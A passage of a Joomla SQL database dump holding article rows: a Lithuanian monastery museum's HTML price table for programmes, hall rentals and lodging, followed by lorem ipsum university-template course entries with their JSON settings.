valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Dekoravimas skystu metalu“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">6,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">19.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Fotosesija vienuolyne (vienuolyno viduje, teritorijoje)</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">30,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">20.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Refektorinės salės, vidinio kiemelio, rūsio patalpų nuoma kultūriniams renginiams</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">50,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">21.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Refektorinės salės, vidinio kiemelio, rūsio patalpų nuoma komerciniams renginiams</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">100,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">22.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Refektorinės salės, vidinio kiemelio, rūsio patalpų nuoma už papildomas valandas</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">80,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">23.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Apgyvendinimo paslauga</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 nakvynė</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">20,00 eur</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p align=\"center\"> </p>\r\n<p align=\"center\"> </p>\r\n<p align=\"center\"> </p>\r\n<p align=\"center\"> </p>\r\n<p align=\"center\"><strong> </strong></p>\r\n<p align=\"center\"><strong> </strong></p>\r\n<p align=\"center\"><strong> </strong></p>\r\n<p> </p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong> </strong></p>','',1,0,0,31,'2013-09-24 11:55:22',135,'','2024-06-24 19:09:19',135,135,'2024-06-24 19:09:19','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/featurecoffe1.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',34,0,7,'','',1,10753,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(34,77,'Education','education','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit , sed do eiusmod tempor incididunt ut labore et dolore</p>','',-2,0,0,13,'2013-09-24 11:55:22',135,'','2013-10-07 07:29:39',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/feature4.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,0,'','',1,16,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(35,78,'Research','research','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit , sed do eiusmod tempor incididunt ut labore et dolore</p>','',-2,0,0,13,'2013-09-24 11:55:22',135,'','2013-10-07 07:31:15',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/feature8.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,0,'','',1,2,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(36,79,'Community','community','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit , sed do eiusmod tempor incididunt ut labore et dolore</p>','',-2,0,0,13,'2013-09-24 11:55:22',135,'','2013-10-07 07:29:24',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/feature3.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,0,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(37,80,'corporate training','life-university','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit , sed do eiusmod tempor incididunt ut labore et dolore</p>','',-2,0,0,13,'2013-09-24 11:55:22',135,'','2013-10-07 07:35:55',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/feature7.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,0,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(38,81,'Initiatives','initiatives','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit , sed do eiusmod tempor incididunt ut labore et dolore</p>','',-2,0,0,13,'2013-09-24 11:55:22',135,'','2013-10-07 07:30:21',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/feature6.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(39,82,'Impact','impact','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit , sed do eiusmod tempor incididunt ut labore et dolore</p>','',-2,0,0,13,'2013-09-24 11:55:22',135,'','2013-10-07 07:30:05',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/feature5.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(42,90,'consectetuer adipiscing','consectetuer-adipiscing','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,15,'2013-09-25 08:43:30',135,'','2013-10-08 05:28:25',135,0,'0000-00-00 00:00:00','2013-09-25 08:43:30','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio1.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,4,'','',1,2,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(44,92,'diam nonummy','diam-nonummy','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,15,'2013-09-25 08:46:17',135,'','2013-10-08 05:27:59',135,0,'0000-00-00 00:00:00','2013-09-25 08:46:17','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio2.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio2.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,2,'','',1,26,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(49,97,'erat volutpat','erat-volutpat','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,16,'2013-09-25 09:22:08',135,'','2013-10-08 05:33:27',135,0,'0000-00-00 00:00:00','2013-09-25 09:22:08','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio6.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio6.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,4,'','',1,45,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(51,99,'enim ad','enim-ad','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,16,'2013-09-25 09:23:50',135,'','2013-10-08 07:08:30',135,0,'0000-00-00 00:00:00','2013-09-25 09:23:50','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio4.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio4.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,2,'','',1,252,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(59,107,'consequat Duis','consequat-duis','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,17,'2013-09-25 09:31:40',135,'','2013-10-08 05:32:17',135,0,'0000-00-00 00:00:00','2013-09-25 09:31:40','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio3.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio3.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,1,'','',1,40,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(60,108,'autem vel','autem-vel','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,17,'2013-09-25 09:32:29',135,'','2014-04-10 07:40:29',135,0,'0000-00-00 00:00:00','2013-09-25 09:32:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/muziejus\\/1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/stories\\/muziejus\\/2.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,0,'','',1,10,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(61,109,'eum iriure','eum-iriure','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,18,'2013-09-25 09:33:40',135,'','2013-10-08 05:30:00',135,0,'0000-00-00 00:00:00','2013-09-25 09:33:40','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio7.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio7.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,4,'','',1,78,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(65,113,'nulla facilisis','nulla-facilisis','','<h3>Course Description</h3>\r\n<p>Aliquam rhoncus molestie auctor. Suspendisse ac risus eros. Vivamus faucibus auctor nibh id semper. Quisque sit amet ante ante. Phasellus vestibulum accumsan ligula quis adipiscing. Sed eget consectetur urna.</p>\r\n<h3>Course Information</h3>\r\n<p>Term-specific class descriptions are available in Class Search within SIS Student Center. Course descriptions for Fall can be found using the search on the details page via the Class Schedule.</p>','',-2,0,0,18,'2013-09-25 09:37:39',135,'','2013-10-08 05:30:30',135,0,'0000-00-00 00:00:00','2013-09-25 09:37:39','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/portfolio\\/portfolio8.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/portfolio\\/portfolio8.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,0,'','',1,43,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(66,114,'University Gallery','university-gallery','','<p>{loadposition gallery-page}</p>','',-2,0,0,14,'2013-09-25 